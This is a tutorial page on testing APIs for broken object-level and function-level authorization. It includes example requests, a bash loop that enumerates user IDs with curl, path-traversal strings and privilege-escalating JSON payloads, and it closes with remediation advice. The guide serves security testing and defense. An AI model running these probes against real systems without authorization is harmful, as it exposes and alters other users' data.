API Security API1 API5

Authorization Testing

Authorization flaws are the most common and critical API vulnerabilities. They occur when the API fails to verify if the authenticated user has permission to access the requested resource or function.

BOLA - Broken Object Level Authorization

BOLA occurs when an API doesn't verify if the user has permission to access a specific object (like a user record, order, or document) based on the ID provided in the request.

1. Identify Endpoints with IDs

Look for endpoints that take an ID as a parameter.

http 
GET /api/users/1001
GET /api/orders/5001
GET /api/documents/doc-abc

2. Change IDs

Try changing the ID to access another user's data.

http 
GET /api/users/1002
GET /api/orders/5002
GET /api/documents/doc-xyz

3. Test Different ID Formats

Sometimes APIs support multiple ID formats.

http 
GET /api/users/1             # Sequential integer
GET /api/users/00001         # Padded integer
GET /api/users/user-uuid-here # UUID
GET /api/users/admin         # Username as ID
GET /api/users/user@email.com # Email as ID

4. ID Enumeration

Script the enumeration of IDs to find valid objects.

bash 
for id in {1..1000}; do
  response=$(curl -s -H "Authorization: Bearer $TOKEN" \
    https://api.target.com/api/users/$id)
  if [[ $response != *"not found"* ]]; then
    echo "Found: $id"
    echo "$response"
  fi
done

5. Test All CRUD Operations

Don't just test GET requests. Try to modify or delete other users' data.

http 
GET    /api/users/1002
PUT    /api/users/1002
DELETE /api/users/1002
PATCH  /api/users/1002

BFLA - Broken Function Level Authorization

BFLA occurs when an API doesn't verify if the user has permission to access a specific function (like an admin endpoint).

1. Identify Privileged Endpoints

Look for endpoints that suggest administrative functionality.

  • /api/admin/users
  • /api/admin/config
  • /api/admin/logs
  • /api/internal/debug
  • /api/management/settings
  • /api/v1/admin/export

2. Access with Low Privileges

Try to access these endpoints with a regular user token.

bash 
curl -H "Authorization: Bearer $USER_TOKEN" \
  https://api.target.com/api/admin/users

3. HTTP Method Manipulation

If GET is blocked, try other methods like POST or PUT.

bash 
curl -X POST -H "Authorization: Bearer $USER_TOKEN" \
  https://api.target.com/api/admin/users

4. Path Manipulation

Try to bypass filters by manipulating the URL path.

  • /api/users/../admin/config
  • /api/v1/users/../../admin/users
  • /api/ADMIN/users
  • /api/Admin/users

5. Parameter-Based Escalation

Try to inject parameters that might elevate privileges.

http 
POST /api/users
Content-Type: application/json

{"name": "test", "role": "admin"}

Other common payloads:

json 
{"name": "test", "isAdmin": true}
{"name": "test", "permissions": ["admin", "write", "delete"]}

6. Role/Permission Changes

Try to update your own role or permissions.

http 
PUT /api/users/1001
Content-Type: application/json

{"role": "admin"}

Remediation

Defense Strategies

  • Implement a consistent authorization mechanism that validates the user's permission for every requested function and object.
  • Use random, unpredictable IDs (UUIDs) instead of sequential integers to prevent enumeration.
  • Check authorization in the business logic layer, not just at the API gateway.
  • Write unit tests to verify that unauthorized users cannot access privileged endpoints.

Related Topics

← Back to API Pentesting

Overview of API security testing

Authentication Testing

JWT and OAuth vulnerabilities

Mass Assignment

Object property injection

IDOR Attacks

Related web vulnerability